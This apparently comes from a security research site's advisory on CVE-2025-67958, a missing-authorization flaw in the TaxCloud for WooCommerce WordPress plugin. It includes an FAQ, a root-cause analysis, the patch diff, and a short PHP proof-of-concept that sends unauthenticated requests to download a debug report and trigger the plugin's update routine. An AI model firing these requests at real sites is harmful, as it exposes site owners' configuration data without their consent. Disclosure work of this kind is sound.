What is CVE-2025-67958?

CVE-2025-67958 is a security vulnerability in the TaxCloud for WooCommerce plugin for WordPress, specifically versions up to and including 8.3.8. It involves a missing authorization check that allows unauthenticated users to perform unauthorized actions, such as downloading debug reports and triggering plugin updates.

How does this vulnerability work?

The vulnerability arises from the lack of capability checks and nonce verification in certain functions of the plugin. Attackers can exploit this by sending crafted HTTP GET requests to specific endpoints, allowing them to access sensitive operations without proper authentication.

Who is affected by this vulnerability?

Any WordPress site using the TaxCloud for WooCommerce plugin version 8.3.8 or earlier is affected. Site administrators should verify their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, access the WordPress admin dashboard, navigate to the Plugins section, and look for the TaxCloud for WooCommerce plugin. Verify that the version is 8.3.8 or earlier.

How can I fix this vulnerability?

The vulnerability is patched in version 8.4.0 of the TaxCloud for WooCommerce plugin. Administrators should update their plugin to the latest version immediately to mitigate the risk.

What does the CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access and potential data exposure.

What are the potential risks of this vulnerability?

Exploitation of this vulnerability can lead to unauthorized access to sensitive debug information and the ability to trigger plugin updates, which may disrupt site functionality or be leveraged in conjunction with other vulnerabilities.

What is nonce verification and why is it important?

Nonce verification is a security measure that ensures requests are valid and come from authenticated users. It helps prevent Cross-Site Request Forgery (CSRF) attacks by requiring a unique token for each request, which was missing in the vulnerable functions.

What actions can an attacker perform due to this vulnerability?

An attacker can download sensitive debug reports containing system information and trigger the plugin’s update process without authentication. These actions can lead to information disclosure and potential system compromise.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can send a simple HTTP GET request to the vulnerable endpoints. It shows that by including specific parameters, an attacker can successfully download a debug report or initiate an update without any authorization.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin temporarily or restricting access to the WordPress admin area to prevent exploitation until the plugin can be updated.

Where can I find more information about this vulnerability?

For more details about CVE-2025-67958, refer to the official CVE database, security advisories from the plugin developers, or trusted security research sites that provide analysis and updates on vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-67958: TaxCloud for WooCommerce <= 8.3.8 – Missing Authorization (simple-sales-tax)

CVE ID CVE-2025-67958

Plugin simple-sales-tax

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 8.3.8

Patched Version 8.4.0

Disclosed January 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67958:
The TaxCloud for WooCommerce plugin for WordPress versions up to and including 8.3.8 contains a Missing Authorization vulnerability (CWE-862). This flaw allows unauthenticated attackers to trigger a debug report download and a plugin update process, actions that should require administrative privileges. The vulnerability has a CVSS score of 5.3 (Medium severity).

The root cause is the absence of capability checks and nonce verification in two administrative functions. In the vulnerable version, the `maybe_download_debug_report` function in `/simple-sales-tax/includes/admin/class-sst-integration.php` only checked for the presence of the `download_debug_report` GET parameter. The function lacked any verification of the user’s permission (`current_user_can(‘manage_options’)`) or a nonce (`wp_verify_nonce`). Similarly, the `trigger_update` function in `/simple-sales-tax/includes/class-sst-install.php` only checked for the `do_sst_update` GET parameter, missing both nonce and capability checks.

Exploitation is straightforward. An attacker can send a simple HTTP GET request to the WordPress admin endpoint with the specific vulnerable parameter. To trigger the debug report download, an unauthenticated request to `/wp-admin/admin.php?page=wc-settings&tab=integration&section=taxcloud-integration&download_debug_report=true` is sufficient. To trigger the plugin update process, an attacker sends a request to `/wp-admin/?do_sst_update=true`. Both actions execute without any authentication or authorization.

The patch in version 8.4.0 addresses the issue by adding proper authorization and nonce verification. In `class-sst-integration.php`, the condition in `maybe_download_debug_report` was extended to require a valid nonce (`sst_debug_report`) and the `manage_options` capability. The debug report download link in `class-sst-settings.php` was also updated to include the nonce. In `class-sst-install.php`, the `trigger_update` function now verifies the `sst_update` nonce and the `manage_options` capability. The same pattern was applied to the `trigger_rate_removal` function. Before the patch, these endpoints were openly accessible. After the patch, they require a valid nonce and administrator privileges.

Successful exploitation allows an unauthenticated attacker to download a debug report, which may contain sensitive system and configuration information. It also allows triggering the plugin’s internal update routine, which could lead to disruption or be used in conjunction with other flaws. While not a direct remote code execution vulnerability, it represents an unauthorized information disclosure and system action.

Differential between vulnerable and patched code

Code Diff

--- a/simple-sales-tax/includes/admin/class-sst-integration.php
+++ b/simple-sales-tax/includes/admin/class-sst-integration.php
@@ -36,6 +36,7 @@
 		// Register action hooks.
 		add_action( 'woocommerce_update_options_integration_' . $this->id, array( $this, 'process_admin_options' ) );
 		add_action( 'woocommerce_update_options_integration_' . $this->id, array( $this, 'refresh_origin_address_list' ), 15 );
+		add_action( 'woocommerce_update_options_integration_' . $this->id, array( $this, 'update_data_mover_settings' ), 20 );
 		add_action( 'admin_init', array( $this, 'maybe_download_debug_report' ) );
 		add_action( 'woocommerce_hide_sst_address_mismatch_notice', array( $this, 'maybe_dismiss_address_notice' ) );
 	}
@@ -241,7 +242,7 @@
 	 * @since 7.0
 	 */
 	public function maybe_download_debug_report() {
-		if ( ! isset( $_GET['download_debug_report'] ) ) { // phpcs:ignore WordPress.CSRF.NonceVerification
+		if ( ! isset( $_GET['download_debug_report'] ) || ! isset( $_GET['nonce'] ) || ! wp_verify_nonce( $_GET['nonce'], 'sst_debug_report' ) || ! current_user_can( 'manage_options' ) ) {
 			return;
 		}

@@ -411,4 +412,93 @@
 		$updater->save()->dispatch();
 	}

+	/**
+	 * Generates the integration mode HTML.
+	 *
+	 * @param string $key  The field key.
+	 * @param array  $data The field data.
+	 *
+	 * @return string The integration mode HTML.
+	 */
+	public function generate_integration_mode_html( $key, $data ) {
+		$field            = "{$this->plugin_id}{$this->id}_{$key}";
+		$api_id           = SST_Settings::get( 'tc_id' );
+		$api_key          = SST_Settings::get( 'tc_key' );
+		$data_mover       = SST_Settings::get( 'data_mover', false );
+
+		$integration_mode = $data_mover == false ? __( 'Premium', 'simple-sales-tax' ) : __( 'Basic', 'simple-sales-tax' );
+
+		ob_start();
+		?>
+
+		<tr valign="top">
+			<th scope="row" class="titledesc">
+				<label for="<?php echo esc_attr( $field ); ?>">
+					<?php echo wp_kses_post( $data['title'] ); ?>
+					<?php if ( ! empty( $api_id ) && ! empty( $api_key ) ): ?>
+						<?php echo wp_kses_post( $this->get_tooltip_html( $data ) ); ?>
+					<?php endif; ?>
+				</label>
+			</th>
+			<td class="forminp">
+				<fieldset>
+					<legend class="screen-reader-text">
+						<span><?php echo wp_kses_post( $data['title'] ); ?></span>
+					</legend>
+					<?php if ( ! empty( $api_id ) && ! empty( $api_key ) ): ?>
+						<div class="d-flex">
+							<input type="text"
+								id="<?php echo esc_attr( $field ); ?>"
+								value="<?php echo esc_attr( $integration_mode ); ?>"
+								readonly="readonly"
+								disabled="disabled">
+								<button type="button" class="components-button is-secondary sst-update-data-mover" data-nonce="<?php echo wp_create_nonce( 'sst-update-data-mover-nonce' ); ?>">
+									<span class="dashicons dashicons-update"></span>
+									<?php echo wp_kses_post( __( 'Refresh', 'simple-sales-tax' ) ); ?>
+								</button>
+						</div>
+						<div class="description">
+							<p>
+								<?php
+								echo wp_kses_post(
+									__(
+										'Premium users can calculate tax in real-time while Basic users can only do data import to TaxCloud.',
+										'simple-sales-tax'
+									)
+								);
+								?>
+								<a href="https://app.taxcloud.com/go/integrations" target="_blank">
+									<?php echo wp_kses_post( __( 'Configure in TaxCloud', 'simple-sales-tax' ) ); ?>
+								</a>
+							</p>
+						</div>
+					<?php else: ?>
+						<div class="notice notice-info inline sst-settings-notice">
+							<p>
+								<?php
+								echo wp_kses_post(
+									__(
+										'Enter your TaxCloud API credentials and click <strong>Save changes</strong> to display the Integration Mode.',
+										'simple-sales-tax'
+									)
+								);
+								?>
+							</p>
+						</div>
+					<?php endif; ?>
+					<?php echo wp_kses_post( $this->get_description_html( $data ) ); ?>
+				</fieldset>
+			</td>
+		</tr>
+		<?php
+		return ob_get_clean();
+	}
+
+	/**
+	 * Updates the data mover settings.
+	 */
+	public function update_data_mover_settings() {
+		SST_TaxCloud_V3_API::update_data_mover_settings();
+	}
+
 }
--- a/simple-sales-tax/includes/admin/views/html-notice-update.php
+++ b/simple-sales-tax/includes/admin/views/html-notice-update.php
@@ -20,7 +20,7 @@
 	?>
 </p>
 <p class="submit">
-	<a href="<?php echo esc_url( admin_url( '?do_sst_update=true' ) ); ?>" class="wc-update-now button-primary">
+	<a href="<?php echo esc_url( admin_url( '?do_sst_update=true&nonce=' . wp_create_nonce( 'sst_update' ) ) ); ?>" class="wc-update-now button-primary">
 		<?php esc_html_e( 'Run the updater', 'simple-sales-tax' ); ?>
 	</a>
 </p>
--- a/simple-sales-tax/includes/class-simplesalestax.php
+++ b/simple-sales-tax/includes/class-simplesalestax.php
@@ -20,7 +20,7 @@
 	 *
 	 * @var string
 	 */
-	    public $version = '8.3.8';
+	    public $version = '8.4.0';

 	/**
 	 * The singleton plugin instance.
@@ -138,6 +138,8 @@
 		require_once __DIR__ . '/class-sst-assets.php';
 		require_once __DIR__ . '/class-sst-marketplaces.php';
 		require_once __DIR__ . '/class-sst-blocks.php';
+		require_once __DIR__ . '/class-sst-taxcloud-v3-api.php';
+		require_once __DIR__ . '/class-sst-taxcloud-v3.php';

 		/**
 		 * Third party integrations.
--- a/simple-sales-tax/includes/class-sst-ajax.php
+++ b/simple-sales-tax/includes/class-sst-ajax.php
@@ -29,6 +29,7 @@
 		'sst_get_certificates'        => false,
 		'sst_dismiss_taxcloud_notice'	=> false,
 		'sst_get_order_log'						=> false,
+		'sst_update_data_mover'				=> false,
 	);

 	/**
@@ -79,6 +80,10 @@
 		} else {
 			try {
 				TaxCloud()->Ping( new TaxCloudRequestPing( $taxcloud_id, $taxcloud_key ) );
+
+				// Ping successful, update data mover settings
+				$data_mover_settings = SST_TaxCloud_V3_API::update_data_mover_settings( $taxcloud_id, $taxcloud_key );
+
 				wp_send_json_success();
 			} catch ( Exception $ex ) {
 				wp_send_json_error( $ex->getMessage() );
@@ -352,6 +357,25 @@
 		wp_send_json_success();
 	}

+	/**
+	 * Update Data Mover settings.
+	 *
+	 * @since 8.3.5
+	 */
+	public static function update_data_mover() {
+		// Verify nonce.
+		check_ajax_referer( 'sst-update-data-mover-nonce' );
+
+		// Update data mover settings
+		SST_TaxCloud_V3_API::update_data_mover_settings();
+
+		// Get data mover settings
+		$data_mover = SST_Settings::get( 'data_mover', false );
+		$integration_mode = $data_mover == false ? __( 'Premium', 'simple-sales-tax' ) : __( 'Basic', 'simple-sales-tax' );
+
+		// Response
+		wp_send_json_success( [ 'integration_mode' => $integration_mode, 'data_mover' => $data_mover ] );
+	}

 }

--- a/simple-sales-tax/includes/class-sst-assets.php
+++ b/simple-sales-tax/includes/class-sst-assets.php
@@ -109,6 +109,7 @@
 								'verify_btn'       => __( 'Verify Settings', 'simple-sales-tax' ),
 								'verifying'        => __( 'Verifying...', 'simple-sales-tax' ),
 								'went_wrong'      => __( 'Something went wrong.', 'simple-sales-tax' ),
+								'mode_refreshed'   => __( 'Success! Your integration mode is now ', 'simple-sales-tax' ),
 							),
 						),
 					),
--- a/simple-sales-tax/includes/class-sst-install.php
+++ b/simple-sales-tax/includes/class-sst-install.php
@@ -82,6 +82,7 @@
 	 */
 	public static function deactivate() {
 		self::remove_notices();
+		self::remove_cron();
 	}

 	/**
@@ -154,8 +155,9 @@

 		// Prompt user to remove rates if any are present.
 		if ( 'yes' !== get_option( 'wootax_keep_rates' ) && self::has_other_rates() ) {
-			$keep_url   = esc_url( admin_url( '?sst_keep_rates=yes' ) );
-			$delete_url = esc_url( admin_url( '?sst_keep_rates=no' ) );
+			$nonce      = wp_create_nonce( 'sst_keep_rates' );
+			$keep_url   = esc_url( admin_url( '?sst_keep_rates=yes&nonce=' . $nonce ) );
+			$delete_url = esc_url( admin_url( '?sst_keep_rates=no&nonce=' . $nonce ) );
 			$notice     = sprintf(
 				/* translators: 1 - URL to keep found rates, 2 - URL to delete found rates */
 				__(
@@ -176,7 +178,7 @@
 	 * Start update when a user clicks the "Update" button in the dashboard.
 	 */
 	public static function trigger_update() {
-		if ( ! empty( $_GET['do_sst_update'] ) ) { // phpcs:ignore WordPress.CSRF.NonceVerification
+		if ( ! empty( $_GET['do_sst_update'] ) && wp_verify_nonce( $_GET['nonce'], 'sst_update' ) && current_user_can( 'manage_options' ) ) {
 			self::update();

 			// Update notice content.
@@ -189,11 +191,10 @@
 	 * Remove rates when user clicks 'keep the rates' or 'delete them.'
 	 */
 	public static function trigger_rate_removal() {
-		global $wpdb;
-
 		$keep_rates = ! empty( $_GET['sst_keep_rates'] ) ? sanitize_text_field( wp_unslash( $_GET['sst_keep_rates'] ) ) : ''; // phpcs:ignore WordPress.CSRF.NonceVerification

-		if ( ! empty( $keep_rates ) ) {
+		if ( ! empty( $keep_rates ) && wp_verify_nonce( $_GET['nonce'], 'sst_keep_rates' ) && current_user_can( 'manage_options' ) ) {
+			global $wpdb;
 			if ( 'no' === $keep_rates ) {
 				$wpdb->query(
 					$wpdb->prepare(
@@ -381,6 +382,13 @@
 			remove_filter( 'woocommerce_order_get_items', array( $GLOBALS['wcms']->order, 'order_item_taxes' ), 30 );
 		}
 	}
+
+	/**
+	 * Remove cron job.
+	 */
+	public static function remove_cron() {
+		wp_clear_scheduled_hook( 'sst_update_data_mover_settings' );
+	}
 }

 SST_Install::init();
--- a/simple-sales-tax/includes/class-sst-marketplaces.php
+++ b/simple-sales-tax/includes/class-sst-marketplaces.php
@@ -65,7 +65,7 @@
 			// Hide the origin address dropdown. We always use the vendor's
 			// address as the origin address in the marketplace setting.
 			add_filter( 'sst_show_origin_address_dropdown', '__return_false' );
-			add_filter( 'sst_settings_form_fields', array( $this, 'change_origin_addresses_description' ) );
+			add_filter( 'sst_settings_form_fields', array( $this, 'change_origin_addresses_description' ), 10, 2 );
 		}
 	}

@@ -110,7 +110,7 @@
 	 *
 	 * @return array
 	 */
-	public function change_origin_addresses_description( $fields ) {
+	public function change_origin_addresses_description( $fields, $settings ) {
 		if ( ! isset( $fields['default_origin_addresses'] ) ) {
 			return $fields;
 		}
--- a/simple-sales-tax/includes/class-sst-settings.php
+++ b/simple-sales-tax/includes/class-sst-settings.php
@@ -123,6 +123,20 @@
 				'desc_tip'    => true,
 				'id'          => 'verifySettings',
 			),
+			'integration_mode'            => array(
+				'title'       => __( 'Integration Mode', 'simple-sales-tax' ),
+				'type'        => 'integration_mode',
+				'default'     => '',
+				'desc_tip'    => true,
+				'description' => __(
+					'Click the refresh button to check TaxCloud for the current mode setting.',
+					'simple-sales-tax'
+				),
+				'custom_attributes' => array(
+					'readonly' => 'readonly',
+					'disabled' => 'disabled',
+				),
+			),
 			'address_settings'            => array(
 				'title'       => __( 'Address Settings', 'simple-sales-tax' ),
 				'type'        => 'title',
@@ -361,7 +375,7 @@
 				'title'       => __( 'Debug Report', 'simple-sales-tax' ),
 				'label'       => __( 'Download', 'simple-sales-tax' ),
 				'type'        => 'anchor',
-				'url'         => add_query_arg( 'download_debug_report', true ),
+				'url'         => add_query_arg( array( 'download_debug_report' => true, 'nonce' => wp_create_nonce( 'sst_debug_report' ) ) ),
 				'id'          => 'debug_report_button',
 				'description' => __(
 					'Send a copy of this report to TaxCloud support to help with debugging TaxCloud for WooCommerce issues.',
@@ -371,7 +385,7 @@
 			),
 		);

-		return apply_filters( 'sst_settings_form_fields', $fields );
+		return apply_filters( 'sst_settings_form_fields', $fields, self::get_settings() );
 	}

 	/**
@@ -419,7 +433,7 @@
 			self::$settings[ $key ] = $empty_value;
 		}

-		return self::$settings[ $key ];
+		return apply_filters( 'sst_get_option', self::$settings[ $key ], $key );
 	}

 	/**
@@ -453,4 +467,17 @@
 		return $wp_roles->get_names();
 	}

+	/**
+	 * Get SST settings
+	 *
+	 * @return array
+	 */
+	public static function get_settings() {
+		if ( empty( self::$settings ) ) {
+			self::load_settings();
+		}
+
+		return self::$settings;
+	}
+
 }
--- a/simple-sales-tax/includes/class-sst-taxcloud-v3-api.php
+++ b/simple-sales-tax/includes/class-sst-taxcloud-v3-api.php
@@ -0,0 +1,182 @@
+<?php
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+/**
+ * TaxCloud v3 API Client.
+ *
+ * Handles authentication and settings retrieval from TaxCloud v3 API.
+ *
+ * @author  Simple Sales Tax
+ * @package SST
+ * @since   8.4.0
+ */
+class SST_TaxCloud_V3_API {
+
+	/**
+	 * API Base URLs.
+	 */
+	const STAGING_AUTH_URL = 'https://staging-taxcloudapi.azurewebsites.net/api/v3/auth/token';
+	const PROD_AUTH_URL    = 'https://taxcloudapi-appservice-core-prod.azurewebsites.net/api/v3/auth/token';
+	const STAGING_MGMT_URL = 'https://api.v3.taxcloud.net/mgmt';
+	const PROD_MGMT_URL    = 'https://api.v3.taxcloud.com/mgmt';
+
+	/**
+	 * Get the appropriate Auth URL based on environment.
+	 *
+	 * @return string
+	 */
+	private static function get_auth_url() {
+		// For now, we'll default to PROD unless a constant is defined for staging.
+		// In the future, this could be a setting.
+		if ( defined( 'SST_TAXCLOUD_STAGING' ) && SST_TAXCLOUD_STAGING ) {
+			return self::STAGING_AUTH_URL;
+		}
+		return self::PROD_AUTH_URL;
+	}
+
+	/**
+	 * Get the appropriate Management URL based on environment.
+	 *
+	 * @return string
+	 */
+	private static function get_mgmt_url() {
+		if ( defined( 'SST_TAXCLOUD_STAGING' ) && SST_TAXCLOUD_STAGING ) {
+			return self::STAGING_MGMT_URL;
+		}
+		return self::PROD_MGMT_URL;
+	}
+
+	/**
+	 * Exchange v1 credentials for v3 Bearer token.
+	 *
+	 * @param string $api_login_id TaxCloud API Login ID.
+	 * @param string $api_key      TaxCloud API Key.
+	 * @return string|WP_Error Access token on success, WP_Error on failure.
+	 */
+	public static function get_auth_token( $api_login_id, $api_key ) {
+		$url = self::get_auth_url();
+
+		$response = wp_remote_post( $url, array(
+			'headers' => array(
+				'Content-Type' => 'application/json',
+			),
+			'body'    => json_encode( array(
+				'apiLoginID' => $api_login_id,
+				'apiKey'     => $api_key,
+			) ),
+			'timeout' => 30,
+		) );
+
+		if ( is_wp_error( $response ) ) {
+			return $response;
+		}
+
+		$code = wp_remote_retrieve_response_code( $response );
+		$body = wp_remote_retrieve_body( $response );
+		$data = json_decode( $body, true );
+
+		if ( $code >= 400 ) {
+			return new WP_Error( 'sst_v3_auth_error', 'Failed to authenticate with TaxCloud v3 API: ' . ( isset( $data['message'] ) ? $data['message'] : $body ) );
+		}
+
+		if ( empty( $data['access_token'] ) ) {
+			return new WP_Error( 'sst_v3_auth_error', 'No access token received from TaxCloud v3 API.' );
+		}
+
+		return $data['access_token'];
+	}
+
+	/**
+	 * Get connection settings using Bearer token.
+	 *
+	 * @param string $api_key      TaxCloud API Key (used as connection ID).
+	 * @param string $access_token Bearer token.
+	 * @return array|WP_Error Settings array on success, WP_Error on failure.
+	 */
+	public static function get_connection_settings( $api_key, $access_token ) {
+		$url = self::get_mgmt_url() . '/connections/' . $api_key;
+
+		$response = wp_remote_get( $url, array(
+			'headers' => array(
+				'Authorization' => 'Bearer ' . $access_token,
+				'Content-Type'  => 'application/json',
+			),
+			'timeout' => 30,
+		) );
+
+		if ( is_wp_error( $response ) ) {
+			return $response;
+		}
+
+		$code = wp_remote_retrieve_response_code( $response );
+		$body = wp_remote_retrieve_body( $response );
+
+		if ( $code === 404 ) {
+			// Connection settings don't exist yet, which is normal for new connections.
+			// Return empty settings.
+			return array();
+		}
+
+		if ( $code >= 400 ) {
+			return new WP_Error( 'sst_v3_settings_error', 'Failed to retrieve connection settings: ' . $body );
+		}
+
+		return json_decode( $body, true );
+	}
+
+	/**
+	 * Get settings using v1 credentials.
+	 *
+	 * @param string $api_login_id TaxCloud API Login ID.
+	 * @param string $api_key      TaxCloud API Key.
+	 * @return array|WP_Error Settings array on success, WP_Error on failure.
+	 */
+	public static function get_settings_with_v1_creds( $api_login_id, $api_key ) {
+		$token = self::get_auth_token( $api_login_id, $api_key );
+
+		if ( is_wp_error( $token ) ) {
+			return $token;
+		}
+
+		return self::get_connection_settings( $api_key, $token );
+	}
+
+	/**
+	 * Update data mover settings using v1 credentials.
+	 *
+	 * @param string $api_login_id TaxCloud API Login ID.
+	 * @param string $api_key      TaxCloud API Key.
+	 * @return array|WP_Error Settings array on success, WP_Error on failure.
+	 */
+	public static function update_data_mover_settings( $api_login_id = null, $api_key = null ) {
+		if ( !$api_login_id || !$api_key ) {
+			$api_login_id	= SST_Settings::get( 'tc_id' );
+			$api_key			= SST_Settings::get( 'tc_key' );
+		}
+
+		// Return if empty
+		if ( empty( $api_login_id ) || empty( $api_key ) ) {
+			SST_Logger::add( 'Failed to update data mover settings: API Login ID or API Key is empty' );
+			return;
+		}
+
+		// Add to cronjob to check daily
+		if ( ! wp_next_scheduled( 'sst_update_data_mover_settings' ) ) {
+			wp_schedule_event( time(), 'daily', 'sst_update_data_mover_settings' );
+		}
+
+		// Check v3 settings
+		$v3_settings = self::get_settings_with_v1_creds( $api_login_id, $api_key );
+
+		if ( ! is_wp_error( $v3_settings ) ) {
+			$data_mover = (bool) isset( $v3_settings['options']['data_mover']['flag'] ) && $v3_settings['options']['data_mover']['flag'];
+			SST_Settings::set( 'data_mover', $data_mover );
+		} else {
+			// Log error but don't fail verification if v3 fails (optional, depending on strictness)
+			SST_Logger::add( 'Failed to fetch v3 settings: ' . $v3_settings->get_error_message() );
+		}
+	}
+}
--- a/simple-sales-tax/includes/class-sst-taxcloud-v3.php
+++ b/simple-sales-tax/includes/class-sst-taxcloud-v3.php
@@ -0,0 +1,87 @@
+<?php
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+/**
+ * TaxCloud v3 Client.
+ *
+ * Handles the data v3 settings.
+ *
+ * @author  Simple Sales Tax
+ * @package SST
+ * @since   8.4.0
+ */
+class SST_TaxCloud_V3 {
+
+	/**
+	 * Singleton instance.
+	 *
+	 * @var SST_TaxCloud_V3
+	 */
+	protected static $_instance = null;
+
+	/**
+	 * Singleton instance accessor.
+	 *
+	 * @return SST_TaxCloud_V3
+	 */
+	public static function instance() {
+		if ( is_null( self::$_instance ) ) {
+			self::$_instance = new self();
+		}
+
+		return self::$_instance;
+	}
+
+	/**
+	 * SST_TaxCloud_V3 constructor.
+	 */
+	protected function __construct() {
+		add_action( 'sst_update_data_mover_settings', array( 'SST_TaxCloud_V3_API', 'update_data_mover_settings' ) );
+		add_filter( 'sst_get_option', array( $this, 'update_realtime_calc_option' ), 10, 2 );
+		add_filter( 'sst_settings_form_fields', array( $this, 'disable_real_time_calc_option' ), 10, 2 );
+	}
+
+	/**
+	 * Disable the disable_real_time_calc option if data mover is true.
+	 *
+	 * @param array $fields Array of settings fields.
+	 *
+	 * @return array
+	 */
+	public function disable_real_time_calc_option( $fields, $settings ) {
+		$data_mover = isset( $settings['data_mover'] ) ? (bool) $settings['data_mover'] : false;
+		if( $data_mover ) {
+			$fields['disable_real_time_calc']['disabled'] =  $data_mover;
+			$fields['disable_real_time_calc']['options'] = array(
+				'yes' => __( 'Yes', 'simple-sales-tax' ),
+			);
+		}
+		return $fields;
+	}
+
+
+	/**
+	 * Update the disable_real_time_calc option if data mover is true.
+	 *
+	 * @param string $value Value of the option.
+	 * @param string $key   Key of the option.
+	 *
+	 * @return string
+	 */
+	public function update_realtime_calc_option( $value, $key ) {
+		if( 'disable_real_time_calc' === $key ) {
+			$data_mover = SST_Settings::get( 'data_mover', false );
+			if( $data_mover ) {
+				return 'yes';
+			}
+		}
+		return $value;
+	}
+
+}
+
+// Initialize the instance.
+SST_TaxCloud_V3::instance();
 No newline at end of file
--- a/simple-sales-tax/includes/sst-functions.php
+++ b/simple-sales-tax/includes/sst-functions.php
@@ -570,4 +570,4 @@
  */
 function sst_get_rate_code() {
 	return apply_filters( 'wootax_rate_code', 'SALES-TAX' );
-}
+}
 No newline at end of file
--- a/simple-sales-tax/includes/vendor/composer/installed.php
+++ b/simple-sales-tax/includes/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'simplesalestax/simplesalestax',
-        'pretty_version' => 'v8.3.8',
-        'version' => '8.3.8.0',
-        'reference' => '38a201072bc1d5afd200a3b5a54149581e0bf66d',
+        'pretty_version' => 'v8.4.0',
+        'version' => '8.4.0.0',
+        'reference' => '92cc977822bc6208e5c1bc0d8606973a97ccb1b1',
         'type' => 'project',
         'install_path' => __DIR__ . '/../../../',
         'aliases' => array(),
@@ -20,9 +20,9 @@
             'dev_requirement' => false,
         ),
         'simplesalestax/simplesalestax' => array(
-            'pretty_version' => 'v8.3.8',
-            'version' => '8.3.8.0',
-            'reference' => '38a201072bc1d5afd200a3b5a54149581e0bf66d',
+            'pretty_version' => 'v8.4.0',
+            'version' => '8.4.0.0',
+            'reference' => '92cc977822bc6208e5c1bc0d8606973a97ccb1b1',
             'type' => 'project',
             'install_path' => __DIR__ . '/../../../',
             'aliases' => array(),
--- a/simple-sales-tax/simple-sales-tax.php
+++ b/simple-sales-tax/simple-sales-tax.php
@@ -7,15 +7,15 @@
  * Author:               TaxCloud
  * Author URI:           https://taxcloud.com
  * GitHub Plugin URI:    https://github.com/bporcelli/simplesalestax
- * Version:              8.3.8
+ * Version:              8.4.0
  * Text Domain:          simple-sales-tax
  * Domain Path:          /languages/
  * License:              GPLv2 or later
  *
  * Requires at least:    4.5.0
- * Tested up to:         6.8.0
+ * Tested up to:         6.9
  * WC requires at least: 6.9.0
- * WC tested up to:      10.2.1
+ * WC tested up to:      10.3.5
  * Requires PHP:         7.4
  *
  * @category             Plugin

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67958 - TaxCloud for WooCommerce <= 8.3.8 - Missing Authorization

<?php

$target_url = 'http://target-site.com'; // CHANGE THIS

// PoC 1: Trigger unauthorized debug report download
$debug_url = $target_url . '/wp-admin/admin.php?page=wc-settings&tab=integration&section=taxcloud-integration&download_debug_report=true';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $debug_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // The plugin may trigger a file download
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 && (strpos($response, 'debug') !== false || curl_getinfo($ch, CURLINFO_CONTENT_TYPE) == 'application/octet-stream')) {
    echo "[+] Debug report download likely successful. Check response for file data.n";
} else {
    echo "[-] Debug report download may have failed. HTTP Code: $http_coden";
}

// PoC 2: Trigger unauthorized plugin update process
$update_url = $target_url . '/wp-admin/?do_sst_update=true';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $update_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "[+] Update trigger request sent.n";
} else {
    echo "[-] Update trigger request failed. HTTP Code: $http_coden";
}

?>

Frequently Asked Questions

What is CVE-2025-67958?
Overview of the vulnerability
CVE-2025-67958 is a security vulnerability in the TaxCloud for WooCommerce plugin for WordPress, specifically versions up to and including 8.3.8. It involves a missing authorization check that allows unauthenticated users to perform unauthorized actions, such as downloading debug reports and triggering plugin updates.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the lack of capability checks and nonce verification in certain functions of the plugin. Attackers can exploit this by sending crafted HTTP GET requests to specific endpoints, allowing them to access sensitive operations without proper authentication.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the TaxCloud for WooCommerce plugin version 8.3.8 or earlier is affected. Site administrators should verify their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Verifying plugin versions
To check if your site is vulnerable, access the WordPress admin dashboard, navigate to the Plugins section, and look for the TaxCloud for WooCommerce plugin. Verify that the version is 8.3.8 or earlier.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 8.4.0 of the TaxCloud for WooCommerce plugin. Administrators should update their plugin to the latest version immediately to mitigate the risk.
What does the CVSS score of 5.3 mean?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access and potential data exposure.
What are the potential risks of this vulnerability?
Consequences of exploitation
Exploitation of this vulnerability can lead to unauthorized access to sensitive debug information and the ability to trigger plugin updates, which may disrupt site functionality or be leveraged in conjunction with other vulnerabilities.
What is nonce verification and why is it important?
Role of nonces in security
